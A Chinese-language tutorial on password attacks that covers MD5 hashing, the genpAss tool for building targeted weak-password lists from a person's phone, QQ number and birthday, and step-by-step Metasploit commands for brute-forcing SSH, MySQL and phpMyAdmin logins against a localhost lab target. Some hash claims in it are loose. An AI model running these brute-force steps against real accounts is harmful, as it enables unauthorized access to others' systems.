本文內容:
- 常見的加密方式
- 密碼生成工具
- 查找爆破模塊
- 實戰密碼爆破
使用MSF的爆破模塊進行進一步"信息收集"。
1,常見的加密方式:
1.MD5加密:
常用的密碼驗證算法,用於操作系統登錄認證。
例如:49ba59abbe56e057 [123456]
明文密碼:
存在規律性
可破解性
對應性[撞庫]
密文:
使用加密算法
唯一性
不可偽造性
不可逆性
常見的hash加密:
https://www.jianshu.com/p/0d53b9b5631e
https://cmd5.com/
在線工具箱:
https://tool.bugku.com/
2.驗證hash值:
Windows自帶工具驗證hash值:
certutil /? 查看幫助
certutil -hashfile 1.jpg MD5 查看文件MD5值
作用:
1.驗證文件是否損壞
2.驗證文件是否被修改[后門]
案例:
https://www.freebuf.com/articles/paper/147403.html (新聞)
https://www.qianxin.com/other/CVE-2019-0708
2,密碼生成工具-genpAss:
中國特色的弱口令生成器:
指令:
-n 命令
-u 用戶名
-q QQ號
-e 郵箱
-m 手機號
-b 生日:格式:2001-01-01
-c 公司名
-o 導出文件
下載地址:https://github.com/RicterZ/genpAss
安全趣聞:https://www.freebuf.com/sectool/197414.html
案例:http://www.anquan.us/static/bugs/wooyun-2016-0197071.html
密碼泄露查詢:https://haveibeenpwned.com/Passwords
3,查找 爆破模塊:
查找爆破模塊的姿勢:
查找關鍵字:login [search type:auxiliary login]
通過搜索功能快速找到我們想要的模塊,縮小范圍、精確定位。
查找服務名:search type:auxiliary name:ssh
查找服務名+關鍵字:search type:auxiliary name:phpmyadmin login
4,實戰密碼爆破:
通過"信息收集"進行針對性的密碼爆破
1.SSH密碼爆破:
使用模塊名:auxiliary/scanner/ssh/ssh_login
1.查找模塊: search type:auxiliary name:ssh
2.使用模塊: use auxiliary/scanner/ssh/ssh_login
3.查看需設置選項:options [pass_file,rhosts,知道用戶名使用USERNAME不知道用戶名使用USERPASS_FILE]
4.設置目標地址:set rhosts 地址[127.0.0.1]
5.設置用戶名:set username root
6.設置字典:set pass_file /root/桌面/1.txt [文件路徑+文件名稱]
7.開始爆破:run
2.MySQL密碼爆破:[顯示詳細結果]
使用模塊名:auxiliary/scanner/mysql/mysql_login
1.查找模塊:search type:auxiliary name:mysql
2.使用模塊:use auxiliary/scanner/mysql/mysql_login
3.查看設置選項:options [pass_file,rport,rhosts,知道用戶名使用USERNAME不知道用戶名使用USERPASS_FILE]
4.設置目標地址:set rhosts 地址 [127.0.0.1]
5.設置用戶名:set username root
6.設置密碼字典:set pass_file /root/桌面/1.txt [文件路徑+文件名稱]
7.開始爆破:run
3.phpadmin登錄驗證爆破:[顯示詳細結果]
使用模塊名:auxiliary/scanner/http/phpmyadmin_login
1.查找模塊:search type:auxiliary name:phpmyadmin
2.使用模塊:use auxiliary/scanner/http/phpmyadmin_login
3.查看設置選項:options [pass_file,rport,rhosts,知道用戶名使用USERNAME不知道用戶名使用USERPASS_FILE]
4.設置目標地址:set rhosts 地址[127.0.0.1]
5.設置端口號:set rport 端口[8080]
6.設置目標范圍:set targeturl phpAdmin/index.php
7.設置用戶名:set username root
8.設置密碼字典:set pass_file /root/桌面/1.txt
9.開始爆破:run